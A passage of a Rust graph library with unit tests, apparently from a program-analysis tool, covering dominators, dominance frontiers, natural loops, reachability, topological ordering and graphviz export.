self.edges.contains_key(&(head, tail))
}
/// Removes an edge
pub fn remove_edge(&mut self, head: usize, tail: usize) -> Result<()> {
if !self.has_edge(head, tail) {
bail!("edge does not exist");
}
self.edges.remove(&(head, tail));
self.predecessors.get_mut(&tail).unwrap().remove(&head);
self.successors.get_mut(&head).unwrap().remove(&tail);
Ok(())
}
/// Inserts a vertex into the graph.
/// # Errors
/// Error if the vertex already exists by index.
pub fn insert_vertex(&mut self, v: V) -> Result<()> {
if self.vertices.contains_key(&v.index()) {
return Err("duplicate vertex index".into());
}
self.vertices.insert(v.index(), v.clone());
self.successors.insert(v.index(), BTreeSet::new());
self.predecessors.insert(v.index(), BTreeSet::new());
Ok(())
}
/// Inserts an edge into the graph.
/// # Errors
/// Error if the edge already exists by indices.
pub fn insert_edge(&mut self, edge: E) -> Result<()> {
if self.edges.contains_key(&(edge.head(), edge.tail())) {
return Err("duplicate edge".into());
}
if !self.vertices.contains_key(&edge.head()) {
return Err(ErrorKind::GraphVertexNotFound(edge.head()).into());
}
if !self.vertices.contains_key(&edge.tail()) {
return Err(ErrorKind::GraphVertexNotFound(edge.tail()).into());
}
self.edges.insert((edge.head(), edge.tail()), edge.clone());
self.successors
.get_mut(&edge.head())
.unwrap()
.insert(edge.tail());
self.predecessors
.get_mut(&edge.tail())
.unwrap()
.insert(edge.head());
Ok(())
}
/// Returns all immediate successors of a vertex from the graph.
pub fn successors(&self, index: usize) -> Result<Vec<&V>> {
if !self.vertices.contains_key(&index) {
bail!(
"Vertex {} does not exist and therefor has no successors",
index
);
}
let vertices = &self.successors[&index];
Ok(vertices.iter().fold(Vec::new(), |mut v, index| {
v.push(self.vertices.get(index).unwrap());
v
}))
}
/// Returns all immediate predecessors of a vertex from the graph.
pub fn predecessors(&self, index: usize) -> Result<Vec<&V>> {
if !self.vertices.contains_key(&index) {
bail!(
"Vertex {} does not exist and therefor has no predecessors",
index
);
}
let vertices = &self.predecessors[&index];
Ok(vertices.iter().fold(Vec::new(), |mut v, index| {
v.push(self.vertices.get(index).unwrap());
v
}))
}
/// Returns the indices of all immediate successors of a vertex from the graph.
pub fn successor_indices(&self, index: usize) -> Result<Vec<usize>> {
if !self.vertices.contains_key(&index) {
bail!(
"Vertex {} does not exist and therefor has no successors",
index
);
}
Ok(self.successors[&index].iter().cloned().collect())
}
/// Returns the indices of all immediate predecessors of a vertex from the graph.
pub fn predecessor_indices(&self, index: usize) -> Result<Vec<usize>> {
if !self.vertices.contains_key(&index) {
bail!(
"Vertex {} does not exist and therefor has no predecessors",
index
);
}
Ok(self.predecessors[&index].iter().cloned().collect())
}
/// Returns all vertices which don't have any predecessors in the graph.
pub fn vertices_without_predecessors(&self) -> Vec<&V> {
self.vertices
.values()
.filter(|v| self.predecessors.get(&v.index()).unwrap().is_empty())
.collect()
}
/// Returns all vertices which don't have any successors in the graph.
pub fn vertices_without_successors(&self) -> Vec<&V> {
self.vertices
.values()
.filter(|v| self.successors.get(&v.index()).unwrap().is_empty())
.collect()
}
/// Computes the set of vertices unreachable from the given index.
pub fn unreachable_vertices(&self, index: usize) -> Result<FxHashSet<usize>> {
let reachable_vertices = self.reachable_vertices(index)?;
Ok(self
.vertices
.keys()
.filter(|index| !reachable_vertices.contains(index))
.cloned()
.collect())
}
/// Computes the set of vertices reachable from the given index.
pub fn reachable_vertices(&self, index: usize) -> Result<FxHashSet<usize>> {
if !self.has_vertex(index) {
bail!("vertex does not exist");
}
let mut reachable_vertices: FxHashSet<usize> = FxHashSet::default();
let mut queue: Vec<usize> = vec![index];
reachable_vertices.insert(index);
while let Some(vertex) = queue.pop() {
self.successors
.get(&vertex)
.unwrap()
.iter()
.for_each(|&succ| {
if reachable_vertices.insert(succ) {
queue.push(succ)
}
});
}
Ok(reachable_vertices)
}
/// Compute the pre order of all vertices in the graph
pub fn compute_pre_order(&self, root: usize) -> Result<Vec<usize>> {
if !self.has_vertex(root) {
bail!("vertex does not exist");
}
let mut visited: FxHashSet<usize> = FxHashSet::default();
let mut stack: Vec<usize> = Vec::new();
let mut order: Vec<usize> = Vec::new();
stack.push(root);
while let Some(node) = stack.pop() {
if !visited.insert(node) {
continue;
}
order.push(node);
for &successor in &self.successors[&node] {
stack.push(successor);
}
}
Ok(order)
}
/// Compute the post order of all vertices in the graph
pub fn compute_post_order(&self, root: usize) -> Result<Vec<usize>> {
let mut visited: FxHashSet<usize> = FxHashSet::default();
let mut order: Vec<usize> = Vec::new();
fn dfs_walk<V: Vertex, E: Edge>(
graph: &Graph<V, E>,
node: usize,
visited: &mut FxHashSet<usize>,
order: &mut Vec<usize>,
) -> Result<()> {
visited.insert(node);
for successor in &graph.successors[&node] {
if !visited.contains(successor) {
dfs_walk(graph, *successor, visited, order)?;
}
}
order.push(node);
Ok(())
}
dfs_walk(self, root, &mut visited, &mut order)?;
Ok(order)
}
/// Computes the dominance frontiers for all vertices in the graph
pub fn compute_dominance_frontiers(
&self,
start_index: usize,
) -> Result<FxHashMap<usize, FxHashSet<usize>>> {
let mut df: FxHashMap<usize, FxHashSet<usize>> = FxHashMap::default();
for vertex in &self.vertices {
df.insert(*vertex.0, FxHashSet::default());
}
let idoms = self.compute_immediate_dominators(start_index)?;
for vertex in &self.vertices {
let vertex_index: usize = *vertex.0;
if self.predecessors[&vertex_index].len() >= 2 {
if !idoms.contains_key(&vertex_index) {
continue;
}
let idom = idoms[&vertex_index];
for predecessor in &self.predecessors[&vertex_index] {
let mut runner = *predecessor;
while runner != idom {
df.get_mut(&runner).unwrap().insert(vertex_index);
if !idoms.contains_key(&runner) {
break;
}
runner = idoms[&runner];
}
}
}
}
// Special handling for the start node as it can be part of a loop.
// This is necessary because we don't have a dedicated entry node.
for predecessor in &self.predecessors[&start_index] {
let mut runner = *predecessor;
loop {
df.get_mut(&runner).unwrap().insert(start_index);
if !idoms.contains_key(&runner) {
break;
}
runner = idoms[&runner];
}
}
Ok(df)
}
/// Computes immediate dominators for all vertices in the graph
///
/// This implementation is based on the Semi-NCA algorithm described in:
/// Georgiadis, Loukas: Linear-Time Algorithms for Dominators and Related Problems (thesis)
/// <https://www.cs.princeton.edu/research/techreps/TR-737-05>
pub fn compute_immediate_dominators(&self, root: usize) -> Result<FxHashMap<usize, usize>> {
if !self.vertices.contains_key(&root) {
bail!("vertex {} not in graph", root);
}
let dfs = self.compute_dfs_tree(root)?;
let dfs_pre_order = dfs.compute_pre_order(root)?;
let dfs_parent = |vertex| dfs.predecessors[&vertex].iter().next().cloned();
// DFS-numbering and reverse numbering (starting from 0 instead of 1 as in the paper)
let dfs_number: FxHashMap<usize, usize> = dfs_pre_order
.iter()
.enumerate()
.map(|(number, vertex)| (*vertex, number))
.collect();
let graph_number = &dfs_pre_order;
let mut ancestor: FxHashMap<usize, Option<usize>> = FxHashMap::default();
let mut label: FxHashMap<usize, usize> = FxHashMap::default();
for &vertex in self.vertices.keys() {
ancestor.insert(vertex, None);
label.insert(vertex, dfs_number[&vertex]);
}
// Compute semidominators in reverse preorder (without root)
let mut semi = FxHashMap::default();
for &vertex in dfs_pre_order.iter().skip(1).rev() {
let mut min_semi = std::usize::MAX;
for &pred in &self.predecessors[&vertex] {
if ancestor[&pred].is_some() {
compress(&mut ancestor, &mut label, pred);
}
min_semi = cmp::min(min_semi, label[&pred]);
}
semi.insert(vertex, min_semi);
label.insert(vertex, min_semi);
ancestor.insert(vertex, dfs_parent(vertex));
}
let semi = semi;
fn compress(
ancestor: &mut FxHashMap<usize, Option<usize>>,
label: &mut FxHashMap<usize, usize>,
v: usize,
) {
let u = ancestor[&v].unwrap();
if ancestor[&u].is_some() {
compress(ancestor, label, u);
if label[&u] < label[&v] {
label.insert(v, label[&u]);
}
ancestor.insert(v, ancestor[&u]);
}
}
// Compute immediate dominators in preorder (without root)
let mut idoms = FxHashMap::default();
for &vertex in dfs_pre_order.iter().skip(1) {
let mut idom = dfs_number[&dfs_parent(vertex).unwrap()];
while idom > semi[&vertex] {
idom = idoms[&idom];
}
idoms.insert(dfs_number[&vertex], idom);
}
let idoms = idoms;
// Translate idoms from DFS-numbering back to graph indices
let mut graph_idoms = FxHashMap::default();
for (vertex, idom) in idoms {
graph_idoms.insert(graph_number[vertex], graph_number[idom]);
}
Ok(graph_idoms)
}
/// Computes dominators for all vertices in the graph
pub fn compute_dominators(
&self,
start_index: usize,
) -> Result<FxHashMap<usize, FxHashSet<usize>>> {
if !self.vertices.contains_key(&start_index) {
bail!("vertex {} not in graph", start_index);
}
let dom_tree = self.compute_dominator_tree(start_index)?;
let dom_tree_pre_oder = dom_tree.compute_pre_order(start_index)?;
let mut dominators: FxHashMap<usize, FxHashSet<usize>> = FxHashMap::default();
for vertex in dom_tree_pre_oder {
let mut doms = FxHashSet::default();
doms.insert(vertex);
for pred in &dom_tree.predecessors[&vertex] {
doms.extend(&dominators[pred])
}
dominators.insert(vertex, doms);
}
Ok(dominators)
}
/// Creates a dominator tree with NullVertex and NullEdge
pub fn compute_dominator_tree(
&self,
start_index: usize,
) -> Result<Graph<NullVertex, NullEdge>> {
let mut graph = Graph::new();
for vertex in &self.vertices {
graph.insert_vertex(NullVertex::new(*vertex.0))?;
}
let idoms = self.compute_immediate_dominators(start_index)?;
for (vertex, idom) in idoms {
graph.insert_edge(NullEdge::new(idom, vertex))?;
}
Ok(graph)
}
/// Computes predecessors for all vertices in the graph
///
/// The resulting sets include all predecessors for each vertex in the
/// graph, not just immediate predecessors.
///
/// Given A -> B -> C, both A and B will be in the set for C.
pub fn compute_predecessors(&self) -> Result<FxHashMap<usize, FxHashSet<usize>>> {
let mut predecessors: FxHashMap<usize, FxHashSet<usize>> = FxHashMap::default();
let mut queue: VecDeque<usize> = VecDeque::new();
// initial population
for vertex in &self.vertices {
let mut preds = FxHashSet::default();
for predecessor in &self.predecessors[vertex.0] {
preds.insert(*predecessor);
}
predecessors.insert(*vertex.0, preds);
queue.push_back(*vertex.0);
}
// for every vertex
while let Some(vertex_index) = queue.pop_front() {
let this_predecessors = predecessors.get(&vertex_index).unwrap().clone();
for successor_index in &self.successors[&vertex_index] {
let successor_predecessors = predecessors.get_mut(successor_index).unwrap();
let mut changed = false;
for predecessor in &this_predecessors {
changed |= successor_predecessors.insert(*predecessor);
}
if changed {
queue.push_back(*successor_index);
}
}
}
Ok(predecessors)
}
/// Creates a DFS tree with NullVertex and NullEdge
pub fn compute_dfs_tree(&self, start_index: usize) -> Result<Graph<NullVertex, NullEdge>> {
if !self.has_vertex(start_index) {
bail!("vertex does not exist");
}
let mut tree = Graph::new();
let mut stack = Vec::new();
tree.insert_vertex(NullVertex::new(start_index))?;
for &successor in &self.successors[&start_index] {
stack.push((start_index, successor));
}
while let Some((pred, index)) = stack.pop() {
if tree.has_vertex(index) {
continue;
}
tree.insert_vertex(NullVertex::new(index))?;
tree.insert_edge(NullEdge::new(pred, index))?;
for &successor in &self.successors[&index] {
stack.push((index, successor));
}
}
Ok(tree)
}
/// Creates an acyclic graph with NullVertex and NullEdge
pub fn compute_acyclic(&self, start_index: usize) -> Result<Graph<NullVertex, NullEdge>> {
let mut graph = Graph::new();
for vertex in &self.vertices {
graph.insert_vertex(NullVertex::new(*vertex.0))?;
}
let predecessors = self.compute_predecessors()?;
let mut visited = FxHashSet::default();
let mut queue = VecDeque::new();
queue.push_back(start_index);
while !queue.is_empty() {
let vertex_index = queue.pop_front().unwrap();
visited.insert(vertex_index);
let vertex_predecessors = &predecessors[&vertex_index];
for successor in &self.successors[&vertex_index] {
// skip edges that would create a loop
if visited.contains(successor) && vertex_predecessors.contains(successor) {
continue;
}
// successors we haven't seen yet get added to the queue
if !visited.contains(successor) && !queue.contains(successor) {
queue.push_back(*successor);
}
graph.insert_edge(NullEdge::new(vertex_index, *successor))?;
}
}
Ok(graph)
}
/// Determines if the graph is acyclic
pub fn is_acyclic(&self, root: usize) -> bool {
let mut permanent_marks: FxHashSet<usize> = FxHashSet::default();
let mut temporary_marks: FxHashSet<usize> = FxHashSet::default();
fn dfs_is_acyclic<V: Vertex, E: Edge>(
graph: &Graph<V, E>,
node: usize,
permanent_marks: &mut FxHashSet<usize>,
temporary_marks: &mut FxHashSet<usize>,
) -> bool {
if permanent_marks.contains(&node) {
return true;
}
if temporary_marks.contains(&node) {
return false;
}
temporary_marks.insert(node);
let successors_are_acyclic = graph.successors[&node].iter().all(|successor| {
dfs_is_acyclic(graph, *successor, permanent_marks, temporary_marks)
});
if !successors_are_acyclic {
return false;
}
temporary_marks.remove(&node);
permanent_marks.insert(node);
true
}
dfs_is_acyclic(self, root, &mut permanent_marks, &mut temporary_marks)
}
/// Computes the set of back edges
///
/// Back edges are edges whose heads dominate their tails.
fn compute_back_edges(&self, head: usize) -> Result<FxHashSet<(usize, usize)>> {
let mut back_edges: FxHashSet<(usize, usize)> = FxHashSet::default();
for (node, dominators) in self.compute_dominators(head)? {
for successor in &self.successors[&node] {
if dominators.contains(successor) {
back_edges.insert((node, *successor));
}
}
}
Ok(back_edges)
}
/// Determines if the graph is reducible.
pub fn is_reducible(&self, head: usize) -> Result<bool> {
let back_edges = self.compute_back_edges(head)?;
// Build a graph without back edges, a.k.a. forward edges (FE) graph.
let mut fe_graph = Graph::new();
for index in self.vertices.keys() {
fe_graph.insert_vertex(NullVertex::new(*index))?;
}
for edge in self.edges.keys() {
if !back_edges.contains(edge) {
fe_graph.insert_edge(NullEdge::new(edge.0, edge.1))?;
}
}
// Graph is reducible iff the FE graph is acyclic and every node is reachable from head.
let every_node_is_reachable = fe_graph.unreachable_vertices(head)?.is_empty();
Ok(every_node_is_reachable && fe_graph.is_acyclic(head))
}
/// Computes the set of natural loops in the graph
pub fn compute_loops(&self, head: usize) -> Result<Vec<Loop>> {
let mut loops: BTreeMap<usize, BTreeSet<usize>> = BTreeMap::new();
// For each back edge compute the set of nodes part of the loop
for (tail, header) in self.compute_back_edges(head)? {
let nodes = loops.entry(header).or_default();
let mut queue: Vec<usize> = Vec::new();
nodes.insert(header);
if nodes.insert(tail) {
queue.push(tail);
}
while let Some(node) = queue.pop() {
for &predecessor in &self.predecessors[&node] {
if nodes.insert(predecessor) {
queue.push(predecessor);
}
}
}
}
Ok(loops
.iter()
.map(|(&header, nodes)| Loop::new(header, nodes.clone()))
.collect())
}
/// Computes the loop tree of all natural loops in the graph
///
/// If loop `l1` is nested in loop `l2`, `l1` is a child node of `l2` in the loop tree.
pub fn compute_loop_tree(&self, head: usize) -> Result<LoopTree> {
let mut tree = LoopTree::new();
let loops = self.compute_loops(head)?;
for l in &loops {
tree.insert_vertex(l.clone())?;
}
for l1 in &loops {
for l2 in &loops {
if l1.is_nesting(l2) {
tree.insert_edge(NullEdge::new(l1.header(), l2.header()))?;
}
}
}
Ok(tree)
}
/// Computes the topological ordering of all vertices in the graph
pub fn compute_topological_ordering(&self) -> Result<Vec<usize>> {
let mut permanent_marks: FxHashSet<usize> = FxHashSet::default();
let mut temporary_marks: FxHashSet<usize> = FxHashSet::default();
let mut order: Vec<usize> = Vec::new();
fn dfs_walk<V: Vertex, E: Edge>(
graph: &Graph<V, E>,
node: usize,
permanent_marks: &mut FxHashSet<usize>,
temporary_marks: &mut FxHashSet<usize>,
order: &mut Vec<usize>,
) -> Result<()> {
if permanent_marks.contains(&node) {
return Ok(());
}
if temporary_marks.contains(&node) {
return Err("Graph contains a loop".into());
}
temporary_marks.insert(node);
for successor in &graph.successors[&node] {
dfs_walk(graph, *successor, permanent_marks, temporary_marks, order)?;
}
temporary_marks.remove(&node);
permanent_marks.insert(node);
order.push(node);
Ok(())
}
for node in self.vertices.keys() {
dfs_walk(
self,
*node,
&mut permanent_marks,
&mut temporary_marks,
&mut order,
)?;
}
Ok(order.into_iter().rev().collect())
}
/// Returns all vertices in the graph.
pub fn vertices(&self) -> Vec<&V> {
self.vertices.values().collect()
}
pub fn vertices_mut(&mut self) -> Vec<&mut V> {
let mut vec = Vec::new();
for vertex in &mut self.vertices {
vec.push(vertex.1);
}
vec
}
/// Fetches a vertex from the graph by index.
pub fn vertex(&self, index: usize) -> Result<&V> {
self.vertices
.get(&index)
.ok_or_else(|| ErrorKind::GraphVertexNotFound(index).into())
}
/// Fetches a mutable instance of a vertex.
pub fn vertex_mut(&mut self, index: usize) -> Result<&mut V> {
self.vertices
.get_mut(&index)
.ok_or_else(|| ErrorKind::GraphVertexNotFound(index).into())
}
pub fn edge(&self, head: usize, tail: usize) -> Result<&E> {
self.edges
.get(&(head, tail))
.ok_or_else(|| ErrorKind::GraphEdgeNotFound(head, tail).into())
}
pub fn edge_mut(&mut self, head: usize, tail: usize) -> Result<&mut E> {
self.edges
.get_mut(&(head, tail))
.ok_or_else(|| ErrorKind::GraphEdgeNotFound(head, tail).into())
}
/// Get a reference to every `Edge` in the `Graph`.
pub fn edges(&self) -> Vec<&E> {
self.edges.values().collect()
}
/// Get a mutable reference to every `Edge` in the `Graph`.
pub fn edges_mut(&mut self) -> Vec<&mut E> {
let mut vec = Vec::new();
for edge in &mut self.edges {
vec.push(edge.1);
}
vec
}
/// Return all edges out for a vertex
pub fn edges_out(&self, index: usize) -> Result<Vec<&E>> {
self.successors
.get(&index)
.map(|succs| {
succs
.iter()
.map(|succ| &self.edges[&(index, *succ)])
.collect()
})
.ok_or_else(|| ErrorKind::GraphVertexNotFound(index).into())
}
/// Return all edges in for a vertex
pub fn edges_in(&self, index: usize) -> Result<Vec<&E>> {
self.predecessors
.get(&index)
.map(|preds| {
preds
.iter()
.map(|pred| &self.edges[&(*pred, index)])
.collect()
})
.ok_or_else(|| ErrorKind::GraphVertexNotFound(index).into())
}
/// Returns a string in the graphviz format
pub fn dot_graph(&self) -> String {
let vertices = self
.vertices
.iter()
.map(|v| {
let label = v.1.dot_label().replace("\n", "\\l");
let fill_color = v.1.dot_fill_color();
let font_color = v.1.dot_font_color();
format!(
"{} [shape=\"box\", label=\"{}\", style=\"filled\", fillcolor=\"{}\", fontcolor=\"{}\"];",
v.1.index(),
label,
fill_color,
font_color,
)
})
.collect::<Vec<String>>();
let edges = self
.edges
.iter()
.map(|e| {
let label = e.1.dot_label().replace("\n", "\\l");
let style = e.1.dot_style();
let fill_color = e.1.dot_fill_color();
let font_color = e.1.dot_font_color();
let pen_width = e.1.dot_pen_width();
format!("{} -> {} [label=\"{}\", style=\"{}\", color=\"{}\", fontcolor=\"{}\", penwidth=\"{}\"];",
e.1.head(), e.1.tail(), label, style, fill_color, font_color, pen_width)
})
.collect::<Vec<String>>();
let options = vec![
"graph [fontname = \"Courier New\", splines=\"polyline\"]",
"node [fontname = \"Courier New\"]",
"edge [fontname = \"Courier New\"]",
];
format!(
"digraph G {{\n{}\n\n{}\n{}\n}}",
options.join("\n"),
vertices.join("\n"),
edges.join("\n")
)
}
}
#[cfg(test)]
mod tests {
use super::*;
impl Vertex for usize {
fn index(&self) -> usize {
*self
}
fn dot_label(&self) -> String {
self.to_string()
}
}
impl Edge for (usize, usize) {
fn head(&self) -> usize {
self.0
}
fn tail(&self) -> usize {
self.1
}
fn dot_label(&self) -> String {
format!("{} -> {}", self.0, self.1)
}
}
/**
* +--> 3 +-+
* / \
* | +--> 4 +--+
* |/ |
* + v
* 1 +---> 2 <-------+ 5
* +
* |
* v
* 6
*
* From: https://en.wikipedia.org/wiki/Dominator_(graph_theory)
*/
fn create_test_graph() -> Graph<usize, (usize, usize)> {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_vertex(6).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 4)).unwrap();
graph.insert_edge((2, 6)).unwrap();
graph.insert_edge((3, 5)).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((5, 2)).unwrap();
graph
}
#[test]
fn test_successors() {
let graph = create_test_graph();
assert_eq!(graph.successors(2).unwrap(), vec![&3, &4, &6]);
let empty_vertex_list: Vec<&usize> = vec![];
assert_eq!(graph.successors(6).unwrap(), empty_vertex_list);
// vertex 7 does not exist
assert!(graph.successors(7).is_err());
}
#[test]
fn test_predecessors() {
let graph = create_test_graph();
let empty_vertex_list: Vec<&usize> = vec![];
assert_eq!(graph.predecessors(1).unwrap(), empty_vertex_list);
assert_eq!(graph.predecessors(2).unwrap(), vec![&1, &5]);
// vertex 7 does not exist
assert!(graph.successors(7).is_err());
}
#[test]
fn test_pre_order() {
let graph = create_test_graph();
assert_eq!(graph.compute_pre_order(1).unwrap(), vec![1, 2, 6, 4, 5, 3]);
assert_eq!(graph.compute_pre_order(5).unwrap(), vec![5, 2, 6, 4, 3]);
}
#[test]
fn test_post_order() {
let graph = create_test_graph();
assert_eq!(graph.compute_post_order(1).unwrap(), vec![5, 3, 4, 6, 2, 1]);
assert_eq!(graph.compute_post_order(5).unwrap(), vec![3, 4, 6, 2, 5]);
}
#[test]
fn test_dominance_frontiers() {
let graph = create_test_graph();
let dominance_frontiers = graph.compute_dominance_frontiers(1).unwrap();
assert_eq!(
dominance_frontiers.get(&1).unwrap(),
&vec![].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&2).unwrap(),
&vec![2].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&3).unwrap(),
&vec![5].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&4).unwrap(),
&vec![5].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&5).unwrap(),
&vec![2].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&6).unwrap(),
&vec![].into_iter().collect()
);
}
#[test]
fn test_dominance_frontiers_of_graph_with_start_node_in_loop() {
// +-------+
// | |
// v +
// ---> 1 +---> 2 +---> 3
// + /\
// | |
// +---------------+
//
// Simplified version of the example given in
// https://www.seas.harvard.edu/courses/cs252/2011sp/slides/Lec04-SSA.pdf
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 1)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph
};
let dominance_frontiers = graph.compute_dominance_frontiers(1).unwrap();
assert_eq!(
dominance_frontiers.get(&1).unwrap(),
&vec![1].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&2).unwrap(),
&vec![1, 3].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&3).unwrap(),
&vec![].into_iter().collect()
);
}
#[test]
fn test_immediate_dominators_graph1() {
let graph = create_test_graph();
let idoms = graph.compute_immediate_dominators(1).unwrap();
assert!(idoms.get(&1).is_none());
assert_eq!(*idoms.get(&2).unwrap(), 1);
assert_eq!(*idoms.get(&3).unwrap(), 2);
assert_eq!(*idoms.get(&4).unwrap(), 2);
assert_eq!(*idoms.get(&5).unwrap(), 2);
assert_eq!(*idoms.get(&6).unwrap(), 2);
}
#[test]
fn test_immediate_dominators_graph2() {
// |
// v
// +--> 0
// | |
// | +--+--+
// | | |
// | v v
// | 1 2 +-+
// | | | |
// | +--+--+ |
// | | |
// | v |
// +--+ 3 |
// | |
// v |
// 4 <----+
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(0).unwrap();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_edge((0, 1)).unwrap();
graph.insert_edge((0, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 4)).unwrap();
graph.insert_edge((3, 0)).unwrap();
graph.insert_edge((3, 4)).unwrap();
graph
};
let idoms = graph.compute_immediate_dominators(0).unwrap();
assert!(idoms.get(&0).is_none());
assert_eq!(*idoms.get(&1).unwrap(), 0);
assert_eq!(*idoms.get(&2).unwrap(), 0);
assert_eq!(*idoms.get(&3).unwrap(), 0);
assert_eq!(*idoms.get(&4).unwrap(), 0);
}
#[test]
fn test_dominators() {
let graph = create_test_graph();
let dominators = graph.compute_dominators(1).unwrap();
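// The dominator set of a vertex v contains every vertex that lies on all paths from the
// start vertex to v, including v itself; the dominator set of the start vertex is just
// the start vertex.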
assert_eq!(dominators.get(&1).unwrap(), &vec![1].into_iter().collect());
assert_eq!(
dominators.get(&2).unwrap(),
&vec![1, 2].into_iter().collect()
);
assert_eq!(
dominators.get(&3).unwrap(),
&vec![1, 2, 3].into_iter().collect()
);
assert_eq!(
dominators.get(&4).unwrap(),
&vec![1, 2, 4].into_iter().collect()
);
assert_eq!(
dominators.get(&5).unwrap(),
&vec![1, 2, 5].into_iter().collect()
);
assert_eq!(
dominators.get(&6).unwrap(),
&vec![1, 2, 6].into_iter().collect()
);
}
#[test]
fn test_dominator_tree() {
let graph = create_test_graph();
let dominator_tree = graph.compute_dominator_tree(1).unwrap();
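// In the dominator tree each vertex's parent is its immediate dominator, so the edges
// below mirror the idoms asserted in test_immediate_dominators_graph1.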
// Expected:
// 1 +---> 2 +---> 3
// |
// +---> 4
// |
// +---> 5
// |
// +---> 6
assert_eq!(dominator_tree.edges().len(), 5);
assert!(dominator_tree.edge(1, 2).is_ok());
assert!(dominator_tree.edge(2, 3).is_ok());
assert!(dominator_tree.edge(2, 4).is_ok());
assert!(dominator_tree.edge(2, 5).is_ok());
assert!(dominator_tree.edge(2, 6).is_ok());
}
#[test]
fn test_all_predecessors() {
let graph = create_test_graph();
let predecessors = graph.compute_predecessors().unwrap();
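// compute_predecessors appears to return transitive predecessors: vertex 2 contains
// itself because the shared graph has a cycle leading back into 2 (via the edge from 5).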
assert_eq!(predecessors.get(&1).unwrap(), &vec![].into_iter().collect());
assert_eq!(
predecessors.get(&2).unwrap(),
&vec![1, 2, 3, 4, 5].into_iter().collect()
);
}
#[test]
fn test_topological_ordering_should_return_error_for_cyclic_graph() {
let graph = create_test_graph();
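// A topological ordering only exists for acyclic graphs; the shared test graph contains
// a loop headed by vertex 2 (see test_compute_loops_single_loop), so the computation is
// expected to fail.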
assert!(graph.compute_topological_ordering().is_err());
}
#[test]
fn test_topological_ordering() {
// ---> 1 +---> 2 +-+-> 3 +---> 4
// + / \ /\
// | / \ |
// +-----> 5 +---> 6 +-+-> 7
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_vertex(6).unwrap();
graph.insert_vertex(7).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 5)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((3, 4)).unwrap();
graph.insert_edge((3, 7)).unwrap();
graph.insert_edge((5, 3)).unwrap();
graph.insert_edge((5, 6)).unwrap();
graph.insert_edge((6, 7)).unwrap();
graph.insert_edge((7, 4)).unwrap();
graph
};
assert_eq!(
graph.compute_topological_ordering().unwrap(),
vec![1, 2, 5, 6, 3, 7, 4]
);
}
#[test]
fn test_vertices_without_predecessors() {
let graph = create_test_graph();
let vertices = graph.vertices_without_predecessors();
assert_eq!(vertices, [graph.vertex(1).unwrap()]);
}
#[test]
fn test_vertices_without_successors() {
let graph = create_test_graph();
let vertices = graph.vertices_without_successors();
assert_eq!(vertices, [graph.vertex(6).unwrap()]);
}
#[test]
fn test_remove_unreachable_vertices() {
let mut graph = Graph::new();
// reachable
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_edge((1, 2)).unwrap();
// unreachable
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 2)).unwrap();
graph.remove_unreachable_vertices(1).unwrap();
assert_eq!(graph.num_vertices(), 2);
assert!(graph.has_vertex(1));
assert!(graph.has_vertex(2));
}
#[test]
fn test_reachable_vertices() {
let mut graph = Graph::new();
// reachable from 1
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_edge((1, 2)).unwrap();
// unreachable from 1
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 2)).unwrap();
let reachable_vertices = graph.reachable_vertices(1).unwrap();
assert_eq!(reachable_vertices.len(), 2);
assert!(reachable_vertices.contains(&1));
assert!(reachable_vertices.contains(&2));
}
#[test]
fn test_unreachable_vertices() {
let mut graph = Graph::new();
// reachable from 1
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_edge((1, 2)).unwrap();
// unreachable from 1
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 2)).unwrap();
let unreachable_vertices = graph.unreachable_vertices(1).unwrap();
assert_eq!(unreachable_vertices.len(), 3);
assert!(unreachable_vertices.contains(&3));
assert!(unreachable_vertices.contains(&4));
assert!(unreachable_vertices.contains(&5));
}
#[test]
fn test_is_acyclic_should_return_false_for_cyclic_graph() {
let graph = create_test_graph();
assert_eq!(graph.is_acyclic(1), false);
}
#[test]
fn test_is_acyclic_should_return_true_for_acyclic_graph() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph
};
assert!(graph.is_acyclic(1));
}
#[test]
